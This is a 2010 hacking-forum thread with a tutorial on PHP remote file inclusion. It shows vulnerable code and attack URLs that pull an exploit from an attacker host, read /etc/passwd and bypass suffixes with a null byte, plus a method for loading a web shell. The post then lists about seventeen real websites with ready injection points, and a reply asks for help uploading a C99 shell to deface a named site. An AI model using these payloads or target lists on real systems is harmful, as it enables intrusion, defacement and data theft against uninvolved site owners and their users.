Post: Remote File Include [RFI] [TUT] [eXhAiL][TeaMp0isoN]
Options
02-20-2010, 03:03 AM
#1
eXhAiL
Keeper
Q,What is RFI ?
A, Remote file inclusion.
Q, What does RFI do ?
A, It allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation.
Checking for a RFI normally it occours in PHP external variables such as :-
$_GET, $_POST, $_COOKIE
Example of bad coding for an RFI
<?php
$color = 'red';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form method="get" action="<?php $_SERVER['PHP_SELF']?>">
<select name="COLOR">
<option value="black">black</option>
<option value="red">red</option>
</select>
<input type="submit">
</form>
The coder intended only black.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject codes and commands from files....
Example of command line for it.
[LIST]
[*]site.com/vuln.php?COLOR=https://evil/exploit? - injects a remotely hosted file containing an exploit.
[*]site.com/vuln.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php
[*]site.com/vuln.php?COLOR=../../../../../../../../etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
[*]cite.com/vuln.php?COLOR=C:\\shell.txt%00 - example using NULL meta character to remove the .php suffix, allowing access to files other than .php.
[/LIST]
there is also another way for checking if you don't want to look at the code, but it isn't as good.
Say you have a site with
news.php?id=1
Replace the one with
https://site.com/shell.txt?
so it would look like this
news.php?id=https://site.com/shell.txt?
now if the file loads as normal you will see you now have acess to there site ia shell and you can use various unix commands to do things.
Hope this tutorial helps.
Here is a Few rfi's.
https://www.zephyrlogic.com/newboard//latest/sirini_gallery_latest/list.php?path=%url??
https://www.monicaherrera.com/site//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=%url??
https://www.alsfilm.net/forum//?sourcedir=%url??
https://justfunradio.de//popup.php?path=%url??
https://www.fandomat.ru//index.php?DOCUMENT_ROOT=%url??
https://www.guok.ru/center/yoga/?_SERVER[DOCUMENT_ROOT]=%url??
https://www.brisbo.dk//ktmllite/includes/ktedit/toolbar.php?dirDepth=%url??
https://www.guok.ru/center/yoga/cigun/?_SERVER[DOCUMENT_ROOT]=%url??
https://www.guok.ru/?_SERVER[DOCUMENT_ROOT]=%url??
https://spb.startelecom.ru/spbforum/?_SERVER[DOCUMENT_ROOT]=%url??
https://www.sexcam-tv.de//?_SERVER%5BDOCUMENT_ROOT%5D=%url??
https://www.microworks.co.za/Voyager/components/com_moofaq/includes/file_includer.php?gzip=0&file=%url??
https://comm.southalabama.edu//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=%url??
https://happymaker.or.kr/?_zb_path=%url??
https://www.wolfems.com/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%url??
https://www.greenkings.co.uk/nuke//arcade.php?phpbb_root_path=%url??
https://www.forex-experts.com//components/com_simpleboard/image_upload.php?sbp=%url??tutorial written by eXhAiL // TeaMp0isoN
Feel free to ask any questions.
Contact:- [email][email protected][/email]
08-06-2010, 05:48 PM
#5
DaRkOpTiC
Guest
Hi eXhAil. I was wondering if I could get in touch with TriCk. I want to learn how to deface and I tried searching you and TriCk on hackforums.net. I have my C99 shell and uploader but I don't know how to upload the shell/uploader to the website. The site is omg.uk.net and the cPanel is omg.uk.net:2082 .
Ty.
You written this on my birthday :black:
-DaRkOpTiC
(Call me a script kiddie if you want to :jim
Sorry for bumping...
Ty.
You written this on my birthday :black:
-DaRkOpTiC
(Call me a script kiddie if you want to :jim
Sorry for bumping...
08-06-2010, 10:07 PM
#6
l33t j0rd4n
Is it because I'm 1337
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
